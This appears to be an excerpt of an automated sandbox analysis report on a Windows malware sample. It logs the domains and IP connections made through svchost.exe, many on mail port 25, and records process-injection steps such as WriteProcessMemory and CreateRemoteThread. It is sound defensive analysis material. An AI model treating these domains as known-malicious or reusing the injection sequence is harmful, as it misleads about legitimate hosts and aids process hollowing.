                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ktenergo.ru
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.220.211.163 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.diamir.de
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.130.146.206 443
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: juso-gr.ch
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.wnsavoy.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.196.145 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.157.27 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 31.177.76.70 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.129.138.60 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.75.216.107 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: midap.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smitko.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 80.82.115.227 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: yhsll.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: anteph.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hyab.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mikihan.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ramkome.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: wahw.com.au
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.227.38.32 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.178.189.131 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kayoaiba.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gbmfg.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccssinc.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 27.0.174.59 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-trust.jp
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.209.32.212 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pro-fa.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.48.207 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: forbin.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cutchie.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: univi.it
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.230.155.43 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.64.163.50 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.live.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: grlawcc.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 154.213.117.166 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.ex-olive.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 151.101.2.132 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.33.95 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.163.170.48 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: coxkitchensandbaths.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: invictus.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: holp-ai.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shittas.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bible.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: missnue.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.137.75.45 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: jsaps.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.126.211.112 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.131 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: haigh-me.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.49.23.144 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.243.77 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.223.113.46 443
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: canasil.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ldh.la.gov
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cpmteam.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kevyt.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: awfraser.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.196.22 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: s5w.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: in1.smtp.messagingengine.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: paraski.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: araax.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: adventist.ro
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.129.97 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.232.113 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 74.208.215.145 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: isom.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: any-s.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.36.175.146 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: piacton.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shztm.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ciicsc.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.spanesi.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: metaforacom.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 210.140.73.39 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dhh.la.gov
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbras.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: atbauk.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ymlp15.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: vvsteknik.dk
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: biosolve.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.0.113.0 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.100.26.245 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.239.32.21 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.27.26 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: atis-sk.ca
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nekono.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cvswl.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.3 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cubodown.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: infotech.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.sbcglobal.yahoo.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: tabbles.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cqdgroup.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.muhr-soehne.de
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 63.251.106.25 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.189.68 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fortknox.bm
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 212.44.102.57 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: camamat.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ikulani.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: alexpope.biz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjborden.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 95.174.22.233 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fundeo.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.79.166 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: lpver.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.151.30.147 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: web-york.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.80.123.104 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.168.172.216 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sanfotek.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.photo4b.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.168.172.220 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fr-dat.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.172.94.1 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.128.140.29 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: beafin.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: stopllc.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 159.89.244.183 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dzm.cz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: oozkranj.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.11.56.48 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: arowines.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: rast.se
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hazmatt.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fifa-ews.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: aba.org.eg
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: wanoa.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shiner.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.128.87 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 82.208.6.9 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.187.206.66 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.reglera.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kustnara.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: msl-lock.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: apcotex.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: scip.org.uk
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.usadig.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.214.171.193 443
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 183.90.232.24 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.95.235 443
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: slower.it
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: okashimo.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.20.220.29 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.55.51 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: workplus.hu
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: c-drop.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: awal.ws
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: jnf.at
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: top1oil.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: at-shun.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjcagent.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kumaden.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 81.169.145.175 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: daytonir.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: iranytu.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.42.105.162 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: banvari.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 178.249.70.75 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.142.176.225 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccrsi.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: snf.it
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbaben.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: anduran.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sinwal.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.219.100.19 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: likangds.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: h-et-l.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kursavto.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: rkengg.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: madjek.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: wolffkran.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.jacomfg.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: wnit.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ntc.edu.au
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: captlfix.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.129.18 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: popbook.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: acraloc.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 80.211.41.39 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: eos-i.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: revoldia.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: uhsa.edu.ag
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: atb-lit.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: skgm.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pleszew.policja.gov.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: icd-host.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.212.145.129 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.56.33.8 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: burstner.ru
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.154.163.204 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: xinhui.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 86.105.245.69 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: aluminox.es
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ie-roi.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mijash3.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: xult.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shanks.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.22.232.175 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.239.201.14 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: vivastay.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.235.175 443
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 59.106.13.169 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-asset.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.0.29.214 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 193.70.68.254 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: plaske.ua
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: touchfam.ca
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.100.180.31 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: indonesiamedia.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: a-domani.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.235.31 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: softizer.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 102.134.49.77 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: rokoron.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: k-nikko.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.193.133 443
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.jroy.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: doggybag.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gbp-jp.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sgk.home.pl
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.185.152 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.4.56.54 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: htsmx.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.96.7 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dwid.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludea.cz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: skypearl.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.92.82.47 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.209.253.30 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: 78san.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: esmoke.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: simetar.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: btsi.com.ph
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: agulatex.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gcss.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.96.161.192 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.66.220 443
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 148.130.4.196 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.143.148 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: alt4.gmail-smtp-in.l.google.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: magicomm.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: xsui.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nolaoig.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mkm-gr.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dyag-eng.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hchc.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: webband.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.197.204.56 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.97.7 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.100.146.220 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: 603888.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 133.242.15.119 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ascc.org.au
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: canmore.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.193.69.252 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pertex.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.130.164.242 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shenhgts.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.mail.yahoo.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: rappich.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: insia.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.172.28.89 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: biurohera.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: agitz.com.br
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: wantapc.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sokuwan.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: duiops.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.200.51.73 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 31.15.12.103 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mcseurope.nl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: orbitgas.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.1.81.28 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fogra.com.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: polprime.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mondopp.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.39.198.18 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: deckoviny.cz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: roewer.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nettle.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: diamir.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: zugseil.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.udesign.biz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: jabian.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: oh28ya.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nme.co.jp
                  Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000Jump to behavior
                  Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2D36008Jump to behavior
                  Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EDF0000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EAE0000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00EC20B0 GetEnvironmentVariableA,lstrcatA,lstrcatA,lstrcatA,VirtualAlloc,CreateProcessA,VirtualFree,VirtualAllocEx,VirtualAllocEx,TerminateProcess,CloseHandle,CloseHandle,VirtualFree,WriteProcessMemory,TerminateProcess,CloseHandle,CloseHandle,VirtualFree,VirtualFree,GetThreadContext,TerminateProcess,CloseHandle,CloseHandle,WriteProcessMemory,TerminateProcess,CloseHandle,CloseHandle,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,4_2_00EC20B0
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00EC2510 VirtualAlloc,VirtualAllocEx,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,VirtualFree,CreateRemoteThread,4_2_00EC2510
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04001DC0 VirtualAlloc,VirtualAllocEx,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,VirtualFree,CreateRemoteThread,5_2_04001DC0
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\pigalicapi.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\pigalicapi.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010DE0BE cpuid 0_2_010DE0BE
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010DE562 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_010DE562
